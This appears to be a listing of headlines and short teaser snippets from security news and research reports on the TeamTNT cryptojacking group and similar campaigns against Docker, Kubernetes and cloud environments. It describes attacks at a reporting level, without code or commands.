TeamTNT Exploits 16 Million IPs in Malware Attack on Docker Clusters

This article details a new campaign by TeamTNT, a notorious hacking group, leveraging exposed Docker daemons to deploy…...

Notorious Hacker Group TeamTNT Launches New Cloud Attacks for Crypto Mining

The infamous cryptojacking group known as TeamTNT appears to be readying for a new large-scale campaign targeting cloud-native environments for mining cryptocurrencies and renting out breached servers to third-parties. "The group is currently targeting exposed Docker daemons to deploy Sliver...

New TeamTNT Cryptojacking Campaign Targets CentOS Servers with Rootkit

The cryptojacking operation known as TeamTNT has likely resurfaced as part of a new campaign targeting Virtual Private Server VPS infrastructures based on the CentOS operating system. "The initial access was accomplished via a Secure Shell SSH brute force attack on the victim's assets, during whi...

TeamTNT's Cloud Credential Stealing Campaign Now Targets Azure and Google Cloud

A malicious actor has been linked to a cloud credential stealing campaign in June 2023 that's focused on Azure and Google Cloud Platform GCP services, marking the adversary's expansion in targeting beyond Amazon Web Services AWS. The findings come from SentinelOne and Permiso, which said the...

TeamTNT's Silentbob Botnet Infecting 196 Hosts in Cloud Attack Campaign

As many as 196 hosts have been infected as part of an aggressive cloud campaign mounted by the TeamTNT group called Silentbob. "The botnet run by TeamTNT has set its sights on Docker and Kubernetes environments, Redis servers, Postgres databases, Hadoop clusters, Tomcat and Nginx servers, Weave...

Silentbob Campaign: Cloud-Native Environments Under Attack

Cybersecurity researchers have unearthed an attack infrastructure that's being used as part of a "potentially massive campaign" against cloud-native environments. "This infrastructure is in early stages of testing and deployment, and is mainly consistent of an aggressive cloud worm, designed to...

Silentbob Campaign: Cloud-Native Environments Under Attack

Cybersecurity researchers have unearthed an attack infrastructure that's being used as part of a "potentially massive campaign" against cloud-native environments. "This infrastructure is in early stages of testing and deployment, and is mainly consistent of an aggressive cloud worm, designed to...

Cryptojacking Group TeamTNT Suspected of Using Decoy Miner to Conceal Data Exfiltration

The cryptojacking group known as TeamTNT is suspected to be behind a previously undiscovered strain of malware used to mine Monero cryptocurrency on compromised systems. That's according to Cado Security, which found the sample after Sysdig detailed a sophisticated attack known as SCARLETEEL aime...

Cryptojacking Group TeamTNT Suspected of Using Decoy Miner to Conceal Data Exfiltration

The cryptojacking group known as TeamTNT is suspected to be behind a previously undiscovered strain of malware used to mine Monero cryptocurrency on compromised systems. That's according to Cado Security, which found the sample after Sysdig detailed a sophisticated attack known as SCARLETEEL aime...

New Cryptojacking Campaign Targeting Vulnerable Docker and Kubernetes Instances

A new cryptojacking campaign has been uncovered targeting vulnerable Docker and Kubernetes infrastructures as part of opportunistic attacks designed to illicitly mine cryptocurrency. Cybersecurity company CrowdStrike dubbed the activity Kiss-a-dog, with its command-and-control infrastructure...

TeamTNT Returns – or Does It?

Our honeypots caught malicious cryptocurrency miner samples targeting the cloud and containers, and its routines are reminiscent of the routines employed by cybercriminal group TeamTNT, which was said to have quit in November 2021. Our investigation shows that another threat actor group, WatchDog...

TeamTNT Returns — Or Does It?

Our honeypots caught malicious cryptocurrency miner samples targeting the cloud and containers, and its routines are reminiscent of the routines employed by cybercriminal group TeamTNT, which was said to have quit in November 2021. Our investigation shows that another threat actor group, WatchDog...

Security Breaks: TeamTNT’s DockerHub Credentials Leak

One of our honeypots based on exposed Docker REST APIs showed cybercriminal group TeamTNT’s potential attack scenario and leak of container registry credentials for docker-abuse malware. The full version of this research will be presented at the c0c0n XV Hacking and Cyber Security Conference in...

Watch Out! Cryptocurrency Miners Targeting Dockers, AWS and Alibaba Cloud

LemonDuck, a cross-platform cryptocurrency mining botnet, is targeting Docker to mine cryptocurrency on Linux systems as part of an active malware campaign. "It runs an anonymous mining operation by the use of proxy pools, which hide the wallet addresses," CrowdStrike said in a new report. "It...

TeamTNT targeting AWS, Alibaba

By Darin Smith.TeamTNT is actively modifying its scripts after they were made public by security researchers.These scripts primarily target Amazon Web Services, but can also run in on-premise, container, or other forms of Linux instances.The group's payloads include credential stealers,... This i...

TeamTNT Upgrades Arsenal, Refines Focus on Kubernetes and GPU Environments

Using a new batch of campaign samples, we take a look at its more recent cybercrime contributions and compare them with its previous deployments to demonstrate the group’s use of upgraded tools and payloads...

Compromised Docker Hub Accounts Abused for Cryptomining Linked to TeamTNT

In October 2021, we observed threat actors targeting poorly configured servers with exposed Docker REST APIs by spinning up containers from images that execute malicious scripts...

TeamTNT’s New Tools Target Multiple OSes

The TeamTNT malware pushers have a slew of new toys with which to wreak havoc – multiple shell/batch scripts, open-source tools, a cryptocurrency miner, an IRC and more – that have inflicted more than 5,000 infections globally as antivirus AV tools struggle to catch up with the newest malware...

IBM: Unauthorized Kubernetes to RCE (root) and found TEAMTNT Crypto Miner on it

This report revealed a vulnerable server running an unauthorized Kubernetes which allowed unkn0wn to gain remote code execution. This issue was reported to IBM and has been remediated...

TeamTNT Campaigns Emphasize Importance of Addressing Cloud Security Gaps

Having covered TeamTNT in several of our blog entries over the past couple of years, we embarked on a research that encompasses the malicious actor group’s campaigns, tools, and techniques in 2020 and early 2021...